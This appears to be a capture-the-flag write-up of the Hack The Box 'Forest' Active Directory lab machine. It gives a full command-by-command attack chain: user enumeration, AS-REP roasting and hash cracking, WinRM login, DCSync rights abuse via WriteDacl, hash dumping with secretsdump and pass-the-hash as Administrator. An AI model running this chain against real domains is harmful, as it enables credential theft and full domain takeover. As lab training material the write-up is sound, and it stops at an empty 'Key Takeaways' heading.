Forest Writeup

25 December 2022 #CTF #HTB #box #easy #windows

forest info


When you go for a walk in a forest, don't forget to take your nmap with you:

$ sudo nmap -n -Pn -F -sCV -oN enum/initial.nmap
53/tcp   open     domain       Simple DNS Plus
88/tcp   open     kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-25 21:58:37Z)
135/tcp  open     msrpc        Microsoft Windows RPC
139/tcp  open     netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open     ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open     microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2022-12-25T13:58:39-08:00
|_clock-skew: mean: 2h46m48s, deviation: 4h37m09s, median: 6m47s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-12-25T21:58:40
|_  start_date: 2022-12-25T21:57:39
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

We see DNS + Kerberos + LDAP open, so it's most likely an Active Directory domain controller. The domain name is htb.local and the host name of the DC is FOREST. Let's add them to our /etc/hosts file.


Always a try zone transfer when DNS is listening on a TCP port:

$ dig @ axfr htb.local

; <<>> DiG 9.18.8-1-Debian <<>> @ axfr htb.local
; (1 server found)
;; global options: +cmd
; Transfer failed.
$ dig @ axfr FOREST.htb.local

; <<>> DiG 9.18.8-1-Debian <<>> @ axfr FOREST.htb.local
; (1 server found)
;; global options: +cmd
; Transfer failed.

Better luck next time...


Let's see if we can list shares anonymously:

$ smbclient -NL      
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Doesn't look like we can...

Next we can try to use rpcclient to get a list of users in the domain with the enumdomusers command. We have to specify the -U '' option in order to use anonymous authentication:

$ rpcclient -N -U '' -c enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

Nice, we got a bunch of usernames. The ouput is a bit ugly and we just want usernames so we'll use this (even uglier) command to get a nice and clean user list:

$ rpcclient -U '' -N -c enumdomusers | grep -oP '\[.*?\]' | grep -v '^\[0x' | tr -d '[]' > users.txt


Now that we have a list of valid usernames on the domain, one thing we could try is looking for users with Kerberos Preauth disabled. If it is, we can request a TGT for that user without their password. The TGT is encrypted with the NTLM hash of the password for that user account, meaning we can grab it and crack it offline with hashchat or john.

We'll use the GetNPUsers script from impacket to do that:

$ impacket-GetNPUsers -usersfile users.txt htb.local/
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation


We got one hit with the 'svc-alfresco' user!

Copy the hash to a file and throw it to hashcat:

$ hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt

And boom, we have the password for that account!

With a username and password we could try to winRM into the box (nmap didn't try port 5985 because it isn't in the top 100):

$ crackmapexec winrm -u svc-alfresco -p s3rvice
SMB    5985   FOREST           [*] Windows 10.0 Build 14393 (name:FOREST) (domain:htb.local)
HTTP    5985   FOREST           [*]
WINRM    5985   FOREST           [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)

Great, we can log in to the DC with evil-winrm:

$ evil-winrm -i -u svc-alfresco -p s3rvice
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>



With a valid domain account, the first thing we should be doing is using Bloodhound to map out the domain and get an overview of the possible misconfigurations.

The first step is to run an ingestor to gather all the data we will then feed to Bloodhound. We'll use rusthound:

$ mkdir bloodhound
$ rusthound -d htb.local -u svc-alfresco -p s3rvice -o bloodhound

Now, just drag and drop all json files from the bloodhound directory directly into the Bloodhound window. We can then search for 'svc-alfresco' and mark this user as owned:

mark as owned

Now we can go to Analysis -> Shortest Paths -> Shortest Paths to Domain Admins from Owned Principals:

shortest path to domain admins from owned principals

We see that our user is a member of the domain group 'Service Accounts' which is itself a member of the 'Privileged IT Accounts' group which is itself a member of the 'Account Operators' group (phew).

'Account Operators' has full control over the 'Exchange Windows Permissions' group, meaning we can just create a user and add it to this group (or add ourselves to the group).

'Exchange Windows Permissions' has the 'WriteDacl' privilege on the domain. We can abuse this by giving our user the right to do a DCSync and get the NTLM hash of all accounts on the domain.

Add user to group

We'll use the built-in net command to do this:

*Evil-WinRM* PS C:\Users\svc-alfresco> net group 'Exchange Windows Permissions' svc-alfresco /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco> net user svc-alfresco
Global Group memberships     *Exchange Windows Perm*Domain Users

Note that there is a cleanup script that will reset group memberships every minute or so.

Grant DCSync Privilege

Right click on the 'WriteDacl' link to get some info on how to exploit it:

abuse info

Add-DomainObjectAcl is a cmdlet from the PowerView collection, so we'll need to get it on the remote box.

We can use the upload feature of evil-winrm to transfer it to the target:

*Evil-WinRM* PS C:\Users\svc-alfresco> upload /opt/PowerView.ps1 ./pv.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco> import-module ./pv.ps1

Before using Add-ObjectACL (more friendly version of Add-DomainObjectAcl), we need a credential object:

*Evil-WinRM* PS C:\Users\svc-alfresco> $pw = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco> $cred = New-Object System.Management.Automation.PSCredential('htb.local\svc-alfresco', $pw)

Now let's give ourselves the privilege to do a DCSync (because why not):

*Evil-WinRM* PS C:\Users\svc-alfresco> Add-ObjectACL -PrincipalIdentity svc-alfresco -Credential $cred -Rights DCSync

Perform DCSync attack

We could use mimikatz but the secretsdump script from impacket allows us to do this remotely:

$ impacket-secretsdump htb.local/svc-alfresco:s3rvice@

Pass the Hash as Administrator

With the administrator's NTLM hash in our hands, we can pass it to psexec or wmiexec:

$ impacket-wmiexec htb.local/administrator@ -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands

Key Takeaways